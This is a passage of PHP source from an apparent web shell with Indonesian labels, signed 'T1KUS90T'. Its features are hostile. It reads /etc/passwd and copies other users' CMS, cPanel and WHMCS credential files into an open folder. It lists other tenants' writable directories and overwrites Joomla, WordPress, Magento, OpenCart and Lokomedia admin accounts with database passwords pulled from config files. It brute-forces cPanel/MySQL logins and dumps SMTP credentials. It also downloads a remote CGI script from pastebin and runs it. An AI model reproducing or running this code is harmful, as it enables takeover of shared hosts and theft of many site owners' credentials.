  757. $okay = true;
  758. break;
  759. }
  760. }
  761. $continue = strtolower($name[1]) == 'zip' ? true : false;
  762. if(!$continue) {
  763. $message = "Salah tolo";
  764. }
  765. $path = dirname(__FILE__).'/';
  766. $filenoext = basename ($filename, '.zip');
  767. $filenoext = basename ($filenoext, '.ZIP');
  768. $targetdir = $path . $filenoext;
  769. $targetzip = $path . $filename;
  770. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  771. mkdir($targetdir, 0777);
  772. if(move_uploaded_file($source, $targetzip)) {
  773. $zip = new ZipArchive();
  774. $x = $zip->open($targetzip);
  775. if ($x === true) {
  776. $zip->extractTo($targetdir);
  777. $zip->close();
  778.  
  779. unlink($targetzip);
  780. }
  781. $message = "<b>Sukses</b>";
  782. } else {
  783. $message = "<b>Error</b>";
  784. }
  785. }
  786. echo "<center><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form></center>";
  787. if($_POST['backup']){
  788. $save=$_POST['save'];
  789. function Zip($source, $destination)
  790. {
  791. if (extension_loaded('zip') === true)
  792. {
  793. if (file_exists($source) === true)
  794. {
  795. $zip = new ZipArchive();
  796.  
  797. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  798. {
  799. $source = realpath($source);
  800.  
  801. if (is_dir($source) === true)
  802. {
  803. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  804.  
  805. foreach ($files as $file)
  806. {
  807. $file = realpath($file);
  808.  
  809. if (is_dir($file) === true)
  810. {
  811. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  812. }
  813.  
  814. else if (is_file($file) === true)
  815. {
  816. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  817. }
  818. }
  819. }
  820.  
  821. else if (is_file($source) === true)
  822. {
  823. $zip->addFromString(basename($source), file_get_contents($source));
  824. }
  825. }
  826.  
  827. return $zip->close();
  828. }
  829. }
  830.  
  831. return false;
  832. }
  833. Zip($_POST['dir'],$save);
  834. echo "<center>Done , Save To <b>$save</b></center>";
  835. }
  836.  
  837. } elseif($_GET['do'] == 'config') {
  838. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  839. $tg = mkdir("tg_config", 0777);
  840. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  841. $htc = fopen("tg_config/.htaccess","w");
  842. fwrite($htc, $isi_htc);
  843. while($passwd = fgets($etc)) {
  844. if($passwd == "" || !$etc) {
  845. echo "<font color=red>Can't read /etc/passwd</font>";
  846. } else {
  847. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  848. foreach($user_config[1] as $user_tg) {
  849. $user_config_dir = "/home/$user_tg/public_html/";
  850. if(is_readable($user_config_dir)) {
  851. $grab_config = array(
  852. "/home/$user_tg/.my.cnf" => "cpanel",
  853. "/home/$user_tg/.accesshash" => "WHM-accesshash",
  854. "/home/$user_tg/public_html/po-content/config.php" => "Popoji",
  855. "/home/$user_tg/public_html/vdo_config.php" => "Voodoo",
  856. "/home/$user_tg/public_html/bw-configs/config.ini" => "BosWeb",
  857. "/home/$user_tg/public_html/config/koneksi.php" => "Lokomedia",
  858. "/home/$user_tg/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  859. "/home/$user_tg/public_html/clientarea/configuration.php" => "WHMCS",
  860. "/home/$user_tg/public_html/whm/configuration.php" => "WHMCS",
  861. "/home/$user_tg/public_html/whmcs/configuration.php" => "WHMCS",
  862. "/home/$user_tg/public_html/forum/config.php" => "phpBB",
  863. "/home/$user_tg/public_html/sites/default/settings.php" => "Drupal",
  864. "/home/$user_tg/public_html/config/settings.inc.php" => "PrestaShop",
  865. "/home/$user_tg/public_html/app/etc/local.xml" => "Magento",
  866. "/home/$user_tg/public_html/joomla/configuration.php" => "Joomla",
  867. "/home/$user_tg/public_html/configuration.php" => "Joomla",
  868. "/home/$user_tg/public_html/wp/wp-config.php" => "WordPress",
  869. "/home/$user_tg/public_html/wordpress/wp-config.php" => "WordPress",
  870. "/home/$user_tg/public_html/wp-config.php" => "WordPress",
  871. "/home/$user_tg/public_html/admin/config.php" => "OpenCart",
  872. "/home/$user_tg/public_html/slconfig.php" => "Sitelok",
  873. "/home/$user_tg/public_html/application/config/database.php" => "Ellislab");
  874. foreach($grab_config as $config => $nama_config) {
  875. $ambil_config = file_get_contents($config);
  876. if($ambil_config == '') {
  877. } else {
  878. $file_config = fopen("tg_config/$user_tg-$nama_config.txt","w");
  879. fputs($file_config,$ambil_config);
  880. }
  881. }
  882. }
  883. }
  884. }
  885. }
  886. echo "<center><a href='?dir=$dir/tg_config'><font color=lime>Done</font></a></center>";
  887. } elseif($_GET['do'] == 'jumping') {
  888. $i = 0;
  889. echo "<div class='margin: 5px auto;'>";
  890. if(preg_match("/hsphere/", $dir)) {
  891. $urls = explode("\r\n", $_POST['url']);
  892. if(isset($_POST['jump'])) {
  893. echo "<pre>";
  894. foreach($urls as $url) {
  895. $url = str_replace(array("http://","www."), "", strtolower($url));
  896. $etc = "/etc/passwd";
  897. $f = fopen($etc,"r");
  898. while($gets = fgets($f)) {
  899. $pecah = explode(":", $gets);
  900. $user = $pecah[0];
  901. $dir_user = "/hsphere/local/home/$user";
  902. if(is_dir($dir_user) === true) {
  903. $url_user = $dir_user."/".$url;
  904. if(is_readable($url_user)) {
  905. $i++;
  906. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  907. if(is_writable($url_user)) {
  908. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  909. }
  910. echo $jrw."<br>";
  911. }
  912. }
  913. }
  914. }
  915. if($i == 0) {
  916. } else {
  917. echo "<br>Total ada ".$i." Kamar di ".$ip;
  918. }
  919. echo "</pre>";
  920. } else {
  921. echo '<center>
  922. <form method="post">
  923. List Domains: <br>
  924. <textarea name="url" style="width: 500px; height: 250px;">';
  925. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  926. while($getss = fgets($fp)) {
  927. echo $getss;
  928. }
  929. echo '</textarea><br>
  930. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  931. </form></center>';
  932. }
  933. } elseif(preg_match("/vhosts/", $dir)) {
  934. $urls = explode("\r\n", $_POST['url']);
  935. if(isset($_POST['jump'])) {
  936. echo "<pre>";
  937. foreach($urls as $url) {
  938. $web_vh = "/var/www/vhosts/$url/httpdocs";
  939. if(is_dir($web_vh) === true) {
  940. if(is_readable($web_vh)) {
  941. $i++;
  942. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  943. if(is_writable($web_vh)) {
  944. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  945. }
  946. echo $jrw."<br>";
  947. }
  948. }
  949. }
  950. if($i == 0) {
  951. } else {
  952. echo "<br>Total ada ".$i." Kamar di ".$ip;
  953. }
  954. echo "</pre>";
  955. } else {
  956. echo '<center>
  957. <form method="post">
  958. List Domains: <br>
  959. <textarea name="url" style="width: 500px; height: 250px;">';
  960. bing("ip:$ip");
  961. echo '</textarea><br>
  962. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  963. </form></center>';
  964. }
  965. } else {
  966. echo "<pre>";
  967. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  968. while($passwd = fgets($etc)) {
  969. if($passwd == '' || !$etc) {
  970. echo "<font color=red>Can't read /etc/passwd</font>";
  971. } else {
  972. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  973. foreach($user_jumping[1] as $user_tg_jump) {
  974. $user_jumping_dir = "/home/$user_tg_jump/public_html";
  975. if(is_readable($user_jumping_dir)) {
  976. $i++;
  977. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  978. if(is_writable($user_jumping_dir)) {
  979. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  980. }
  981. echo $jrw;
  982. if(function_exists('posix_getpwuid')) {
  983. $domain_jump = file_get_contents("/etc/named.conf");
  984. if($domain_jump == '') {
  985. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  986. } else {
  987. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  988. foreach($domains_jump[1] as $dj) {
  989. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  990. $user_jumping_url = $user_jumping_url['name'];
  991. if($user_jumping_url == $user_tg_jump) {
  992. echo " => ( <u>$dj</u> )<br>";
  993. break;
  994. }
  995. }
  996. }
  997. } else {
  998. echo "<br>";
  999. }
  1000. }
  1001. }
  1002. }
  1003. }
  1004. if($i == 0) {
  1005. } else {
  1006. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1007. }
  1008. echo "</pre>";
  1009. }
  1010. echo "</div>";
  1011. } elseif($_GET['do'] == 'auto_edit_user') {
  1012. if($_POST['hajar']) {
  1013. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1014. echo "username atau password harus lebih dari 6 karakter";
  1015. } else {
  1016. $user_baru = $_POST['user_baru'];
  1017. $pass_baru = md5($_POST['pass_baru']);
  1018. $conf = $_POST['config_dir'];
  1019. $scan_conf = scandir($conf);
  1020. foreach($scan_conf as $file_conf) {
  1021. if(!is_file("$conf/$file_conf")) continue;
  1022. $config = file_get_contents("$conf/$file_conf");
  1023. if(preg_match("/JConfig|joomla/",$config)) {
  1024. $dbhost = ambilkata($config,"host = '","'");
  1025. $dbuser = ambilkata($config,"user = '","'");
  1026. $dbpass = ambilkata($config,"password = '","'");
  1027. $dbname = ambilkata($config,"db = '","'");
  1028. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1029. $prefix = $dbprefix."users";
  1030. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1031. $db = mysql_select_db($dbname);
  1032. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1033. $result = mysql_fetch_array($q);
  1034. $id = $result['id'];
  1035. $site = ambilkata($config,"sitename = '","'");
  1036. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1037. echo "Config => ".$file_conf."<br>";
  1038. echo "CMS => Joomla<br>";
  1039. if($site == '') {
  1040. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1041. } else {
  1042. echo "Sitename => $site<br>";
  1043. }
  1044. if(!$update OR !$conn OR !$db) {
  1045. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1046. } else {
  1047. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1048. }
  1049. mysql_close($conn);
  1050. } elseif(preg_match("/WordPress/",$config)) {
  1051. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1052. $dbuser = ambilkata($config,"DB_USER', '","'");
  1053. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1054. $dbname = ambilkata($config,"DB_NAME', '","'");
  1055. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1056. $prefix = $dbprefix."users";
  1057. $option = $dbprefix."options";
  1058. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1059. $db = mysql_select_db($dbname);
  1060. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1061. $result = mysql_fetch_array($q);
  1062. $id = $result[ID];
  1063. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1064. $result2 = mysql_fetch_array($q2);
  1065. $target = $result2[option_value];
  1066. if($target == '') {
  1067. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1068. } else {
  1069. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1070. }
  1071. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1072. echo "Config => ".$file_conf."<br>";
  1073. echo "CMS => Wordpress<br>";
  1074. echo $url_target;
  1075. if(!$update OR !$conn OR !$db) {
  1076. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1077. } else {
  1078. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1079. }
  1080. mysql_close($conn);
  1081. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1082. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1083. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1084. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1085. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1086. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1087. $prefix = $dbprefix."admin_user";
  1088. $option = $dbprefix."core_config_data";
  1089. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1090. $db = mysql_select_db($dbname);
  1091. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1092. $result = mysql_fetch_array($q);
  1093. $id = $result[user_id];
  1094. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1095. $result2 = mysql_fetch_array($q2);
  1096. $target = $result2[value];
  1097. if($target == '') {
  1098. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1099. } else {
  1100. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1101. }
  1102. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1103. echo "Config => ".$file_conf."<br>";
  1104. echo "CMS => Magento<br>";
  1105. echo $url_target;
  1106. if(!$update OR !$conn OR !$db) {
  1107. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1108. } else {
  1109. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1110. }
  1111. mysql_close($conn);
  1112. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1113. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1114. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1115. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1116. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1117. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1118. $prefix = $dbprefix."user";
  1119. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1120. $db = mysql_select_db($dbname);
  1121. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1122. $result = mysql_fetch_array($q);
  1123. $id = $result[user_id];
  1124. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1125. if($target == '') {
  1126. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1127. } else {
  1128. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1129. }
  1130. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1131. echo "Config => ".$file_conf."<br>";
  1132. echo "CMS => OpenCart<br>";
  1133. echo $url_target;
  1134. if(!$update OR !$conn OR !$db) {
  1135. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1136. } else {
  1137. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1138. }
  1139. mysql_close($conn);
  1140. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1141. $dbhost = ambilkata($config,'server = "','"');
  1142. $dbuser = ambilkata($config,'username = "','"');
  1143. $dbpass = ambilkata($config,'password = "','"');
  1144. $dbname = ambilkata($config,'database = "','"');
  1145. $prefix = "users";
  1146. $option = "identitas";
  1147. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1148. $db = mysql_select_db($dbname);
  1149. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1150. $result = mysql_fetch_array($q);
  1151. $target = $result[alamat_website];
  1152. if($target == '') {
  1153. $target2 = $result[url];
  1154. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1155. if($target2 == '') {
  1156. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1157. } else {
  1158. $cek_login3 = file_get_contents("$target2/adminweb/");
  1159. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1160. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1161. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1162. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1163. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1164. } else {
  1165. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1166. }
  1167. }
  1168. } else {
  1169. $cek_login = file_get_contents("$target/adminweb/");
  1170. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1171. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1172. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1173. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1174. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1175. } else {
  1176. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1177. }
  1178. }
  1179. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1180. echo "Config => ".$file_conf."<br>";
  1181. echo "CMS => Lokomedia<br>";
  1182. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1183. echo $url_target2;
  1184. } else {
  1185. echo $url_target;
  1186. }
  1187. if(!$update OR !$conn OR !$db) {
  1188. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1189. } else {
  1190. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1191. }
  1192. mysql_close($conn);
  1193. }
  1194. }
  1195. }
  1196. } else {
  1197. echo "<center>
  1198. <h1>Auto Edit User Config</h1>
  1199. <form method='post'>
  1200. DIR Config: <br>
  1201. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1202. Set User & Pass: <br>
  1203. <input type='text' name='user_baru' value='T1KUS90T' placeholder='user_baru'><br>
  1204. <input type='text' name='pass_baru' value='T1KUS90T' placeholder='pass_baru'><br>
  1205. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1206. </form>
  1207. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1208. ";
  1209. }
  1210. } elseif($_GET['do'] == 'cpanel') {
  1211. if($_POST['crack']) {
  1212. $usercp = explode("\r\n", $_POST['user_cp']);
  1213. $passcp = explode("\r\n", $_POST['pass_cp']);
  1214. $i = 0;
  1215. foreach($usercp as $ucp) {
  1216. foreach($passcp as $pcp) {
  1217. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1218. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1219. } else {
  1220. $_SESSION[$ucp] = "1";
  1221. $_SESSION[$pcp] = "1";
  1222. if($ucp == '' || $pcp == '') {
  1223.  
  1224. } else {
  1225. $i++;
  1226. if(function_exists('posix_getpwuid')) {
  1227. $domain_cp = file_get_contents("/etc/named.conf");
  1228. if($domain_cp == '') {
  1229. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  1230. } else {
  1231. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1232. foreach($domains_cp[1] as $dj) {
  1233. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1234. $user_cp_url = $user_cp_url['name'];
  1235. if($user_cp_url == $ucp) {
  1236. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  1237. break;
  1238. }
  1239. }
  1240. }
  1241. } else {
  1242. $dom = "<font color=red>function is Disable by system</font>";
  1243. }
  1244. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1245. }
  1246. }
  1247. }
  1248. }
  1249. }
  1250. if($i == 0) {
  1251. } else {
  1252. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>T1KUS90T.</font>";
  1253. }
  1254. } else {
  1255. echo "<center>
  1256. <form method='post'>
  1257. USER: <br>
  1258. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1259. $_usercp = fopen("/etc/passwd","r");
  1260. while($getu = fgets($_usercp)) {
  1261. if($getu == '' || !$_usercp) {
  1262. echo "<font color=red>Can't read /etc/passwd</font>";
  1263. } else {
  1264. preg_match_all("/(.*?):x:/", $getu, $u);
  1265. foreach($u[1] as $user_cp) {
  1266. if(is_dir("/home/$user_cp/public_html")) {
  1267. echo "$user_cp\n";
  1268. }
  1269. }
  1270. }
  1271. }
  1272. echo "</textarea><br>
  1273. PASS: <br>
  1274. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1275. function cp_pass($dir) {
  1276. $pass = "";
  1277. $dira = scandir($dir);
  1278. foreach($dira as $dirb) {
  1279. if(!is_file("$dir/$dirb")) continue;
  1280. $ambil = file_get_contents("$dir/$dirb");
  1281. if(preg_match("/WordPress/", $ambil)) {
  1282. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1283. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1284. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1285. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1286. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1287. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1288. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1289. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1290. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1291. } elseif(preg_match("/^[client]$/", $ambil)) {
  1292. preg_match("/password=(.*?)/", $ambil, $pass1);
  1293. if(preg_match('/"/', $pass1[1])) {
  1294. $pass1[1] = str_replace('"', "", $pass1[1]);
  1295. $pass .= $pass1[1]."\n";
  1296. } else {
  1297. $pass .= $pass1[1]."\n";
  1298. }
  1299. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1300. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1301. }
  1302. }
  1303. echo $pass;
  1304. }
  1305. $cp_pass = cp_pass($dir);
  1306. echo $cp_pass;
  1307. echo "</textarea><br>
  1308. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1309. </form>
  1310. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1311. }
  1312. } elseif($_GET['do'] == 'smtp') {
  1313. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1314. function scj($dir) {
  1315. $dira = scandir($dir);
  1316. foreach($dira as $dirb) {
  1317. if(!is_file("$dir/$dirb")) continue;
  1318. $ambil = file_get_contents("$dir/$dirb");
  1319. $ambil = str_replace("$", "", $ambil);
  1320. if(preg_match("/JConfig|joomla/", $ambil)) {
  1321. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1322. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1323. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1324. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1325. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1326. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1327. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1328. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1329. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1330. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1331. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1332. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1333. }
  1334. }
  1335. }
  1336. $smpt_hunter = scj($dir);
  1337. echo $smpt_hunter;
  1338. } elseif($_GET['do'] == 'cgi') {
  1339. $cgi_dir = mkdir('tg_cgi', 0755);
  1340. $file_cgi = "tg_cgi/cgi.izo";
  1341. $isi_htcgi = "AddHandler cgi-script .izo";
  1342. $htcgi = fopen(".htaccess", "w");
  1343. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1344. $cgi = fopen($file_cgi, "w");
  1345. fwrite($cgi, $cgi_script);
  1346. fwrite($htcgi, $isi_htcgi);
  1347. chmod($file_cgi, 0755);
  1348. echo "<iframe src='tg_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1349.  
  1350. } elseif($_GET['do'] == 'adminer') {
  1351. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1352. function adminer($url, $isi) {
  1353. $fp = fopen($isi, "w");
  1354. $ch = curl_init();
  1355. curl_setopt($ch, CURLOPT_URL, $url);
  1356. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1357. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1358. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1359. curl_setopt($ch, CURLOPT_FILE, $fp);
  1360. return curl_exec($ch);
  1361. curl_close($ch);
  1362. fclose($fp);
  1363. ob_flush();
  1364. flush();
  1365. }
  1366. if(file_exists('adminer.php')) {
  1367. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1368. } else {
  1369. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1370. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1371. } else {
  1372. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1373. }
  1374. }
  1375. } elseif($_GET['act'] == 'newfile') {
  1376. if($_POST['new_save_file']) {
  1377. $newfile = htmlspecialchars($_POST['newfile']);
  1378. $fopen = fopen($newfile, "a+");
  1379. if($fopen) {
  1380. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1381. } else {
  1382. $act = "<font color=red>permission denied</font>";
  1383. }
  1384. }
  1385. echo $act;
  1386. echo "<form method='post'>
  1387. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1388. <input type='submit' name='new_save_file' value='Submit'>
  1389. </form>";
  1390. } elseif($_GET['act'] == 'newfolder') {
  1391. if($_POST['new_save_folder']) {
  1392. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1393. if(!mkdir($new_folder)) {
  1394. $act = "<font color=red>permission denied</font>";
  1395. } else {
  1396. $act = "<script>window.location='?dir=".$dir."';</script>";
  1397. }
  1398. }
  1399. echo $act;
  1400. echo "<form method='post'>
  1401. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1402. <input type='submit' name='new_save_folder' value='Submit'>
  1403. </form>";
  1404. } elseif($_GET['act'] == 'rename_dir') {
  1405. if($_POST['dir_rename']) {
  1406. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1407. if($dir_rename) {
  1408. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1409. } else {
  1410. $act = "<font color=red>permission denied</font>";
  1411. }
  1412. echo "".$act."<br>";
  1413. }
  1414. echo "<form method='post'>
  1415. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1416. <input type='submit' name='dir_rename' value='rename'>
  1417. </form>";
  1418. } elseif($_GET['act'] == 'delete_dir') {
  1419. if(is_dir($dir)) {
  1420. if(is_writable($dir)) {
  1421. @rmdir($dir);
  1422. @exe("rm -rf $dir");
  1423. @exe("rmdir /s /q $dir");
  1424. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1425. } else {
  1426. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1427. }
  1428. }
  1429. echo $act;
  1430. } elseif($_GET['act'] == 'view') {
  1431. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
